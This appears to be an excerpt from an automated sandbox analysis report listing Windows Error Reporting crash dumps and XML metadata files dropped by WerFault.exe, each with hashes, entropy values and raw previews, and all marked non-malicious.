                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.0.4.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3355.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.568043673979562
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsXJg77aI944c/WpW8VY/Ym8M4JuXLBF+k+q8K/7uo41Dgd:uIjf5I7y4cu7V/JgVZuoqDgd
                                                                                                                                                                                                            MD5:6DAB5841BBB40D41FD36E3A5ED637DD7
                                                                                                                                                                                                            SHA1:6D17A42521F90ACFF076E6E7EE710E6C6AB6A2B0
                                                                                                                                                                                                            SHA-256:8F1DB72A29520931BFD1DD290357F92D3DBD80D58A23494E4412718478B9829A
                                                                                                                                                                                                            SHA-512:706AE806600224E260A8685EF2B1423FD5B8C539ACE3374BE4E24BD6473495F85922C592729909C01611E1E9E76CCE86943FE81B73DE7CF8FEF9D2F01D44152D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D46.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:17 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):888734
                                                                                                                                                                                                            Entropy (8bit):1.7854932760432178
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:zh/GtqPJWlP+vCvXu0KI71ZyVCYen2WpYai4FHeLcU4m0ga7gIVmwrnXsWq5TarY:zh/GtZlmCm0KQNvnZHeLcUpatdq0M
                                                                                                                                                                                                            MD5:F7570E583B7391139AC339DAA89986F0
                                                                                                                                                                                                            SHA1:A65A6FEDFD531BECAFDE269DF14788C6A7BD119F
                                                                                                                                                                                                            SHA-256:EFCB0D62ABD3F57BB0306AB517A942BE2B53DBC57B4F8E158ACFA4B5EFDBB0FC
                                                                                                                                                                                                            SHA-512:232C79024CB69C012F444BBBDF954F60A677D6ABD15B87CD5DBC49C38E912F02E504E063681C0FA17A4DD995F9FC0FDF30646AA74B862155D9943463BB7B9F3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........:2g.....................................,...G..........T.......8...........T............................/...........1..............................................................................eJ......\2......GenuineIntel............T............92g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER41FA.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8440
                                                                                                                                                                                                            Entropy (8bit):3.7116643732021006
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJRWy6Sxs6YcD+SUfUfgmfCerypru89bJHsfJDm:R6lXJRb6Ms6Y5SUfUfgmfCer4JMfA
                                                                                                                                                                                                            MD5:02F3FEF73B5C7FE8F1588A890EF3A074
                                                                                                                                                                                                            SHA1:580FD6843EBB93590E748C947617A8D6E2F1EE64
                                                                                                                                                                                                            SHA-256:4364BA481F98341270B5BB080393F397327AEC9B627A96FD88B089946CDD4C97
                                                                                                                                                                                                            SHA-512:3DADA5897F75E189C4528B70554448EAAB45AEEA47CD4C4E17C90A217A41F0251F46CAF8675752FDC1EDCAEF6373DFE568956ABB3FDCD8A2C16806DDCB8F4382
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.2.8.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER422A.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.569390102829339
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsXJg77aI944c/WpW8VY9kYm8M4JuXLBFj+q8K/7y41DLd:uIjf5I7y4cu7VCJgPZyqDLd
                                                                                                                                                                                                            MD5:2677F9A67BB0A9EB01AEC1D66F8E80B9
                                                                                                                                                                                                            SHA1:267A673084868285FB4085CB168D61F6E385788B
                                                                                                                                                                                                            SHA-256:B863FE4F736AAC506D2A4F1DB4CD23C4B386655551CB370D173363D39C7F6412
                                                                                                                                                                                                            SHA-512:F370144A74B84DCEB065E6FFAFFD2ADF8F9AFAD6F60D48A2FDA62B65FAD9A48D670E553508C4B458C2C33C1D289DEBB15C77A3941F205E16B8AC893CB0F5B184
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5533.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:23 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):827744
                                                                                                                                                                                                            Entropy (8bit):1.7002121172562972
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:EVU7Buxs72irBeRYn3k/52j0trM7GJw49MKqJNgL99ht8+7F189lgdbNd:QU7isCileKW4t7GJwopqXiS2t
                                                                                                                                                                                                            MD5:60E9BFE10FD7BCB4BDAC657CA7DE3677
                                                                                                                                                                                                            SHA1:E45C182E3B0B32CB93B7AECF2152D0D8353008C2
                                                                                                                                                                                                            SHA-256:22AEB5109EA81149A89DA397408B7CC75384EE41D627E079DD06A6F0BCEB5487
                                                                                                                                                                                                            SHA-512:F9A79D562C590A86A32614BB8209A6BEF97A4DC8D169FB4EB50D5A956CB93AC45623DA4707A25B45853124F143F918B694BC2BCD6022899DE032DA55B32B9A9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........:2g.....................................$...B..........T.......8...........T...........Hh...9..........x/..........d1..............................................................................eJ.......1......GenuineIntel............T............92g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A16.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.712161285954589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJEWW6K166YcDUSUlUGgmfCeryprd89bWfsfhDSm:R6lXJEf6l6YjSUlUGgmfCer9WEfx
                                                                                                                                                                                                            MD5:EB4E196A5BCA84DBDA7F6C1A7B140873
                                                                                                                                                                                                            SHA1:51243A635D1E1C66360C8E2F874DE9927AD0011E
                                                                                                                                                                                                            SHA-256:DF6BAB7F5A09EB5E5834D20D23D7F215F2253459EEB74EABB872E7BBA2F0873C
                                                                                                                                                                                                            SHA-512:6670DEF627361578E7497B09B8A04CED74B9E0437AB1A264DB14799783743F3C714523C33A2475E0E0BD78E26EF69E0A19347BF3933BD1436B9580968F0E1B26
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.6.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D15.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.569290786373477
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsoJg77aI944c/WpW8VYoYm8M4JuXLBF9+q8K/7OH41DUd:uIjfuI7y4cu7VkJg5ZOHqDUd
                                                                                                                                                                                                            MD5:396D150D9DC22FCA3E035113092BB36F
                                                                                                                                                                                                            SHA1:B943FAE8B07E033BD7F83FF9381D756A26C34F53
                                                                                                                                                                                                            SHA-256:3FE457AED2F61A39D48130D4CEB4B86B46EDFB6D6EE52EA5BD6DB045EB6C9617
                                                                                                                                                                                                            SHA-512:7088999D58C2DD5837FC61C97F217E6DAD81BA2EC344AB22F8626108DD09D4DA62607C62C15C1FBE7EA0D2AEE7DF7DDE6BF0AFF1FC94B550190D6F29428D5F6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583691" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DED.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:25 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):964280
                                                                                                                                                                                                            Entropy (8bit):1.754663931391682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:RD7NaJouyJPCuQNH+60sSt+YqmEzPMAC25O:RDIJouyJPCuM74a5O
                                                                                                                                                                                                            MD5:9469B28D917B4B8B3116AF89D1E4DA09
                                                                                                                                                                                                            SHA1:6CE02011CD8CCFBBB3191B80483567F47052BD51
                                                                                                                                                                                                            SHA-256:D66FE795A1EC3CE521FA4BCFB1A5B85EDD2A7B5E5DB7BE3BD64B9031384040F0
                                                                                                                                                                                                            SHA-512:CC3220D8E8416BD4EC691CF7000435654A059155969C94F14D2DC9DFB0A87A6F39570E2F8073AC52CF189DA5D33AED1E6C4012A80EF29D99441DDE48DD8AED5A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........:2g............D...............L........*...k..........T.......8...........T............................2...........4..............................................................................eJ.......4......GenuineIntel............T............92g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6253.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8442
                                                                                                                                                                                                            Entropy (8bit):3.7143353584510836
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJTWz6C6YcD6SU1UPgmfCeryprC89bk3sf7sm:R6lXJT66C6YdSU1UPgmfCerMk8fF
                                                                                                                                                                                                            MD5:7239E76FB803A825C406ED83F6AE848B
                                                                                                                                                                                                            SHA1:9F8F552F5266039CBD474EF7B66D1A3DBD279A85
                                                                                                                                                                                                            SHA-256:A9B5169E0D823ABC25279431FE864063228658CBCCFBF450817776C7610A17A0
                                                                                                                                                                                                            SHA-512:DA58768D8CDE2FE64F70A066012049F5DA84E151D8804A264115D6B0FC7C865EC28D2970F60526F5338E80014B335C8178B5A87ADFA11BE78A166C8F089145EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.1.2.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER62F1.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.567918503737517
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsoJg77aI944c/WpW8VYFYm8M4JuXLBFF+q8K/7q41Dhdd:uIjfuI7y4cu7VhJg5ZqqDhdd
                                                                                                                                                                                                            MD5:48ABC0D33729B72656A572F905630A9D
                                                                                                                                                                                                            SHA1:4B5C8B9C96701D92BC4451BDD6C174FB1ABC7287
                                                                                                                                                                                                            SHA-256:3EDD9EEB81BB7122ED0265340C171473D2C637186819000F331C88A62404C3BC
                                                                                                                                                                                                            SHA-512:455A04D6FACA2C9CA7E61CCE874C1694F3A712B4095CB76CE4F58BAB42E1942EA76861B85FC51451BBDE038AAD478F2B55002A24579D024B17AEAFA03BA71CE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583691" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6427.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:27 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):663452
                                                                                                                                                                                                            Entropy (8bit):1.4572931173819914
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:lEyiq1kj+Y5rrh8SngsLfMguBvP+GLlJ0s:KyZKF5rFDgOfMmG
                                                                                                                                                                                                            MD5:D0D1D2EAB4897A9AAF1988A7F8D5F39A
                                                                                                                                                                                                            SHA1:4F6223F9A8B2098A262734184BD00A3D280D45C5
                                                                                                                                                                                                            SHA-256:070EDEF1B5BAB638574770EDE1588B595E197C7DC976C502CDB13B4E30609443
                                                                                                                                                                                                            SHA-512:50B9C33DF98931F8980C8A57205B6C48D4510842246FEE9E067AFCF047433565831385EEA3CF1DB9199DF88F10905683340E01C8B4550B4008BDBF07914FAF54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........:2g........................................8...........T.......8...........T...........h...4............+...........-..............................................................................eJ......$.......GenuineIntel............T.......l....92g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER69A6.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.714585847108227
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJpWF6z96YcD1SUeUngmfCeryprx89bqEsfium:R6lXJpM6p6YCSUeUngmfCerJq3fy
                                                                                                                                                                                                            MD5:431167522E23B3B401F5FABC73DE8E8D
                                                                                                                                                                                                            SHA1:43B947E5FF626087DB3866D427A82D4E6ABD4DA9
                                                                                                                                                                                                            SHA-256:2531716D028E3B7F902B2C92292AD81F1AC943798F54A55B4E11A3E292D55F8B
                                                                                                                                                                                                            SHA-512:FF739C69C547CA7CA12EEA8A4813415E029D1D3DD134B9FD4FAE38680EB5FF23C359B45C11E4006B760B9556DD1A2C4CBF8232F3751B259585D3C2809D30B84E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.0.0.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A73.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
